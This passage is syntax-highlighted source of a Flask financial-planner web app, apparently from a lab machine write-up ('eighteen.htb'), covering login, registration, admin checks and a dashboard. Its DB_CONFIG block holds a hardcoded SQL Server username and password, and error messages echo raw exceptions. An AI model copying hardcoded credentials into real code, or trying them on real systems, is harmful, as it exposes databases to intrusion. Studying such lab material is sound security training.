class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span><span class="lnt">202 </span><span class="lnt">203 </span><span class="lnt">204 </span><span class="lnt">205 </span><span class="lnt">206 </span><span class="lnt">207 </span><span class="lnt">208 </span><span class="lnt">209 </span><span class="lnt">210 </span><span class="lnt">211 </span><span class="lnt">212 </span><span class="lnt">213 </span><span class="lnt">214 </span><span class="lnt">215 </span><span class="lnt">216 </span><span class="lnt">217 </span><span class="lnt">218 </span><span class="lnt">219 </span><span class="lnt">220 </span><span class="lnt">221 </span><span class="lnt">222 </span><span class="lnt">223 </span><span class="lnt">224 </span><span class="lnt">225 </span><span class="lnt">226 </span><span class="lnt">227 </span><span class="lnt">228 </span><span class="lnt">229 </span><span class="lnt">230 </span><span class="lnt">231 </span><span class="lnt">232 </span><span class="lnt">233 </span><span class="lnt">234 </span><span class="lnt">235 </span><span class="lnt">236 </span><span class="lnt">237 </span><span class="lnt">238 </span><span class="lnt">239 </span><span class="lnt">240 </span><span class="lnt">241 </span><span class="lnt">242 </span><span class="lnt">243 </span><span class="lnt">244 </span><span class="lnt">245 </span><span class="lnt">246 </span><span class="lnt">247 </span><span class="lnt">248 </span><span class="lnt">249 </span><span class="lnt">250 </span><span class="lnt">251 </span><span class="lnt">252 </span><span class="lnt">253 </span><span class="lnt">254 </span><span class="lnt">255 </span><span class="lnt">256 </span><span class="lnt">257 </span><span class="lnt">258 </span><span class="lnt">259 </span><span class="lnt">260 </span><span class="lnt">261 </span><span class="lnt">262 </span><span class="lnt">263 </span><span class="lnt">264 </span><span class="lnt">265 </span><span class="lnt">266 </span><span class="lnt">267 </span><span class="lnt">268 </span><span class="lnt">269 </span><span class="lnt">270 </span><span class="lnt">271 </span><span class="lnt">272 </span><span class="lnt">273 </span><span class="lnt">274 </span><span class="lnt">275 </span><span class="lnt">276 </span><span class="lnt">277 </span><span class="lnt">278 </span><span class="lnt">279 </span><span class="lnt">280 </span><span class="lnt">281 </span><span class="lnt">282 </span><span class="lnt">283 </span><span class="lnt">284 </span><span class="lnt">285 </span><span class="lnt">286 </span><span class="lnt">287 </span><span class="lnt">288 </span><span class="lnt">289 </span><span class="lnt">290 </span><span class="lnt">291 </span><span class="lnt">292 </span><span class="lnt">293 </span><span class="lnt">294 </span><span class="lnt">295 </span><span class="lnt">296 </span><span class="lnt">297 </span><span class="lnt">298 </span><span class="lnt">299 </span><span class="lnt">300 </span><span class="lnt">301 </span><span class="lnt">302 </span><span class="lnt">303 </span><span class="lnt">304 </span><span class="lnt">305 </span><span class="lnt">306 </span><span class="lnt">307 </span><span class="lnt">308 </span><span class="lnt">309 </span><span class="lnt">310 </span><span class="lnt">311 </span><span class="lnt">312 </span><span class="lnt">313 </span><span class="lnt">314 </span><span class="lnt">315 </span><span class="lnt">316 </span><span class="lnt">317 </span><span class="lnt">318 </span><span class="lnt">319 </span><span class="lnt">320 </span><span class="lnt">321 </span><span class="lnt">322 </span><span class="lnt">323 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">url_for</span><span class="p">,</span> <span class="n">session</span><span class="p">,</span> <span class="n">flash</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">werkzeug.security</span> <span class="kn">import</span> <span class="n">generate_password_hash</span><span class="p">,</span> <span class="n">check_password_hash</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">functools</span> <span class="kn">import</span> <span class="n">wraps</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">pyodbc</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">datetime</span> <span class="kn">import</span> <span class="n">datetime</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">app</span> <span class="o">=</span> <span class="n">Flask</span><span class="p">(</span><span class="vm">__name__</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">app</span><span class="o">.</span><span class="n">secret_key</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">urandom</span><span class="p">(</span><span class="mi">24</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">app</span><span class="o">.</span><span class="n">config</span><span class="p">[</span><span class="s1">&#39;SESSION_TYPE&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;filesystem&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">DB_CONFIG</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;server&#39;</span><span class="p">:</span> <span class="s1">&#39;dc01.eighteen.htb&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;database&#39;</span><span class="p">:</span> <span class="s1">&#39;financial_planner&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;username&#39;</span><span class="p">:</span> <span class="s1">&#39;appdev&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;password&#39;</span><span class="p">:</span> <span class="s1">&#39;MissThisElite$90&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;driver&#39;</span><span class="p">:</span> <span class="s1">&#39;{ODBC Driver 17 for SQL Server}&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;TrustServerCertificate&#39;</span><span class="p">:</span> <span class="s1">&#39;True&#39;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">get_db_connection</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">conn_str</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&#34;DRIVER=</span><span class="si">{</span><span class="n">DB_CONFIG</span><span class="p">[</span><span class="s1">&#39;driver&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">;SERVER=</span><span class="si">{</span><span class="n">DB_CONFIG</span><span class="p">[</span><span class="s1">&#39;server&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">;DATABASE=</span><span class="si">{</span><span class="n">DB_CONFIG</span><span class="p">[</span><span class="s1">&#39;database&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">;UID=</span><span class="si">{</span><span class="n">DB_CONFIG</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">;PWD=</span><span class="si">{</span><span class="n">DB_CONFIG</span><span class="p">[</span><span class="s1">&#39;password&#39;</span><span class="p">]</span><span class="si">}</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">pyodbc</span><span class="o">.</span><span class="n">connect</span><span class="p">(</span><span class="n">conn_str</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">login_required</span><span class="p">(</span><span class="n">f</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nd">@wraps</span><span class="p">(</span><span class="n">f</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">decorated_function</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="s1">&#39;user_id&#39;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">session</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Please log in to access this page.&#39;</span><span class="p">,</span> <span class="s1">&#39;warning&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;login&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">f</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">decorated_function</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">admin_required</span><span class="p">(</span><span class="n">f</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nd">@wraps</span><span class="p">(</span><span class="n">f</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">decorated_function</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="s1">&#39;user_id&#39;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">session</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Please log in to access this page.&#39;</span><span class="p">,</span> <span class="s1">&#39;warning&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;login&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT is_admin FROM users WHERE id = ?&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">session</span><span class="p">[</span><span class="s1">&#39;user_id&#39;</span><span class="p">],))</span> </span></span><span class="line"><span class="cl"> <span class="n">user</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">user</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">user</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Access denied. Admin privileges required.&#39;</span><span class="p">,</span> <span class="s1">&#39;danger&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;dashboard&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">f</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">decorated_function</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">track_visit</span><span class="p">(</span><span class="n">page</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">user_agent</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">headers</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;User-Agent&#39;</span><span class="p">,</span> <span class="s1">&#39;Unknown&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;INSERT INTO visits (user_agent, visited_page, timestamp) VALUES (?, ?, ?)&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">user_agent</span><span class="p">,</span> <span class="n">page</span><span class="p">,</span> <span class="n">datetime</span><span class="o">.</span><span class="n">now</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">commit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">pass</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">index</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">track_visit</span><span class="p">(</span><span class="s1">&#39;/&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;index.html&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/features&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">features</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">track_visit</span><span class="p">(</span><span class="s1">&#39;/features&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;features.html&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/register&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;GET&#39;</span><span class="p">,</span> <span class="s1">&#39;POST&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">register</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">track_visit</span><span class="p">(</span><span class="s1">&#39;/register&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">request</span><span class="o">.</span><span class="n">method</span> <span class="o">==</span> <span class="s1">&#39;POST&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">full_name</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;full_name&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">email</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;email&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;password&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">password_hash</span> <span class="o">=</span> <span class="n">generate_password_hash</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="s1">&#39;pbkdf2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;INSERT INTO users (full_name, username, email, password_hash, is_admin, created_at) VALUES (?, ?, ?, ?, 0, ?)&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">full_name</span><span class="p">,</span> <span class="n">username</span><span class="p">,</span> <span class="n">email</span><span class="p">,</span> <span class="n">password_hash</span><span class="p">,</span> <span class="n">datetime</span><span class="o">.</span><span class="n">now</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">commit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Registration successful! Please log in.&#39;</span><span class="p">,</span> <span class="s1">&#39;success&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;login&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;Registration failed. Username or email may already exist. </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">,</span> <span class="s1">&#39;danger&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;register&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;register.html&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;GET&#39;</span><span class="p">,</span> <span class="s1">&#39;POST&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">login</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">track_visit</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">request</span><span class="o">.</span><span class="n">method</span> <span class="o">==</span> <span class="s1">&#39;POST&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;password&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT id, password_hash, full_name FROM users WHERE username = ?&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">username</span><span class="p">,))</span> </span></span><span class="line"><span class="cl"> <span class="n">user</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">user</span> <span class="ow">and</span> <span class="n">check_password_hash</span><span class="p">(</span><span class="n">user</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">password</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="p">[</span><span class="s1">&#39;user_id&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">user</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">username</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="p">[</span><span class="s1">&#39;full_name&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">user</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;Welcome back, </span><span class="si">{</span><span class="n">user</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="si">}</span><span class="s1">!&#39;</span><span class="p">,</span> <span class="s1">&#39;success&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;dashboard&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Invalid username or password.&#39;</span><span class="p">,</span> <span class="s1">&#39;danger&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;login.html&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/logout&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">logout</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">session</span><span class="o">.</span><span class="n">clear</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;You have been logged out.&#39;</span><span class="p">,</span> <span class="s1">&#39;info&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;index&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/dashboard&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nd">@login_required</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dashboard</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">track_visit</span><span class="p">(</span><span class="s1">&#39;/dashboard&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">user_id</span> <span class="o">=</span> <span class="n">session</span><span class="p">[</span><span class="s1">&#39;user_id&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT monthly_salary, yearly_salary FROM incomes WHERE user_id = ? ORDER BY created_at DESC&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">user_id</span><span class="p">,))</span> </span></span><span class="line"><span class="cl"> <span class="n">income</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT id, category, type, value FROM expenses WHERE user_id = ?&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">user_id</span><span class="p">,))</span> </span></span><span class="line"><span class="cl"> <span class="n">expenses</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchall</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT savings, investments FROM allocations WHERE user_id = ? ORDER BY created_at DESC&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">user_id</span><span class="p">,))</span> </span></span><span class="line"><span class="cl"> <span class="n">allocation</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">monthly_salary</span> <span class="o">=</span> <span class="n">income</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">if</span> <span class="n">income</span> <span class="k">else</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> <span class="n">yearly_salary</span> <span class="o">=</span> <span class="n">income</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">if</span> <span class="n">income</span> <span class="k">else</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">total_expenses</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> <span class="n">expense_list</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">exp</span> <span class="ow">in</span> <span class="n">expenses</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">exp_id</span><span class="p">,</span> <span class="n">category</span><span class="p">,</span> <span class="n">exp_type</span><span class="p">,</span> <span class="n">value</span> <span class="o">=</span> <span class="n">exp</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">exp_type</span> <span class="o">==</span> <span class="s1">&#39;fixed&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">amount</span> <span class="o">=</span> <span class="n">value</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">amount</span> <span class="o">=</span> <span class="p">(</span><span class="n">value</span> <span class="o">/</span> <span class="mi">100</span><span class="p">)</span> <span class="o">*</span> <span class="n">monthly_salary</span> </span></span><span class="line"><span class="cl"> <span class="n">total_expenses</span> <span class="o">+=</span> <span class="n">amount</span> </span></span><span class="line"><span class="cl"> <span class="n">expense_list</span><span class="o">.</span><span class="n">append</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;id&#39;</span><span class="p">:</span> <span class="n">exp_id</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;category&#39;</span><span class="p">:</span> <span class="n">category</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;type&#39;</span><span class="p">:</span> <span class="n">exp_type</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;value&#39;</span><span class="p">:</span> <span class="n">value</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;amount&#39;</span><span class="p">:</span> <span class="n">amount</span> </span></span><span class="line"><span class="cl"> <span class="p">})</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span 